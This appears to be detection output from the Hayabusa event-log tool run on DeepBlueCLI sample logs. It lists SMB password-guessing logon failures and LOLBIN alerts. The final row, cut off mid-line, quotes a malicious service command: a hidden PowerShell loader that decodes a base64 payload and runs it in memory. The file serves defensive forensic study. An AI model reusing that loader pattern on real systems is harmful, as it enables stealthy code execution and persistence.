+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JfrbGLqKGru8AE2a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.961 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 813natbodi6QauRW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:52:47.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KpfKxOZG3xSr5Yqm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fErWiEb0USDghXsB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.083 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fOWF6YnW8UEPlw41 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SNPXuHduatLFQc8W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.157 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 35rfur4MzKzwxCIn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.201 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VmAqzaZaeoSjcuh5 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.238 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lKuCpuGcGmDOoewr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.281 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bz6SOAeTyqsBz6Oa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.317 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CSURiEoC7dw0w0ru | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.369 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bDjwkaHT8lrFmn9X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ayI129HgVWA5q4Sk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: jT2yiuOJS8Fvf9SD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.495 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1hpAO2UrjFd6Kxt0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.537 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZkgGj9Fnqn3XwnBT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WFXPYo0yzR7p8dNU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9j6MxN7PuM29Vlcq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w1CWIqoV6GzmmlRm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:52:47.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uiBfvnfTcIG4xJoi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.741 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dED7HYntoE5D7XvG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.781 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pX1ztnCKiePrPbTT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u3XQcfMHJDsBtJDy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.864 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MhRsRIS5tHKLv2oL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.917 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JmkLhptugDU2fDWp | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.952 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2yk62yREbgDCj9pB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.997 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6JPvkmaAsJlwn9t3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.034 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lhciP1zM9njlRI3j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.069 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: duNDenwdo1oHVuoL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.114 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0ChBZOYkTm1SguA1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: RU38tuiKC0weexmb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jg0Hp4xtz0pAMhCz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.231 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5AorVNz5MgTeEvn2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.275 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8oJ6tVjBxlYyj5ej | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oEAEOi0TsSRVPlz4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: USfEwKkH8OUADVds | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:52:48.400 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y0jg1i6tDiInd10i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.441 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xv2jRzrgoP6lJdAJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.485 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LmuAXUwSkhR3tSRg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.535 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zy4Fkpvcrlmp9AES | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.572 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 51ipUXvrRh0CPH1e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.670 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5TB15XKzVJwIyjqU | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.713 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i1F6muFPBlPyHPbR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XNXwYS73RElHozUo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ft1MLPJISeq0bMsa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.845 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i8kbFOwQiCyRVMDV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.879 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ToPzuDEmXN1fjIcS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: pKF1QKEuTXIGnrx2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.964 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fyHpo6pX8TEo6ttv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:49.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3uYqEt90yr8B3rK9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:49.048 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2LKkrM0slVn0CKHw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:49.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TyJ82cfaddnc8c6D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:49.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KJRw0S82SupmuS4Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:52:49.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: z4lSo9BMWdcPLfLb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:49.208 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XreSLg472qhJw0R3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:49.266 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KIJcQJKLmnjrE2T9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:49.309 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zlddo3GCTEIkFyi9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:49.359 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hxiZoB5mHR2tGUFM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:49.399 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fpEbpiox2Q3Qf8av | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:54:20.959 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x438 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 01:55:28.022 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x338 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 01:55:39.187 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x658 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 02:43:48.712 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\8xpeyiyp.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xbf4 | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 02:43:48.834 +09:00,IE10Win7,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\ud-vxj7k.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x840 | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 02:43:49.017 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\gsxogihi.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x2f8 | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 02:43:49.106 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\owummvtl.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xe48 | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 02:43:49.183 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations | Path: C:\Windows\System32\rundll32.exe | PID: 0xe8c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 02:43:49.891 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
""C:\Windows\system32\PING.EXE"" ""Local CMOS Clock"" /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0xfb0 | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 02:43:49.912 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" time.windows.com /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0x184 | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 05:36:09.147 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: zIGuwymOgHZnXZPm | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object 
IO.MemoryStream(,[Convert]::FromBase64String(''[base64 payload removed]''));IEX (New-Object IO.StreamReader(New-Object 
